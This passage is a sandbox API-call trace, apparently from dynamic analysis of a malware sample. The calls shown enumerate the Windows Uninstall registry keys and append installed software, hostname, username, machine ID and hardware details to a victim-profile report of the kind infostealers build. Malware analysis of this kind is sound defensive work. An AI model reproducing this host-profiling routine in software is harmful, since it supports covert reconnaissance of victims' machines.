C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 " [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 ", lpString2="12.0.30501.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0" [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n" [0208.116] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.116] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x23, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.116] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}") returned 94 [0208.116] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.116] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x19ce18*=0x3c) returned 0x0 [0208.116] lstrlenA (lpString="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned 59 [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n", lpString2="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219" [0208.116] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="10.0.40219", lpcbData=0x19ce18*=0xb) returned 0x0 [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 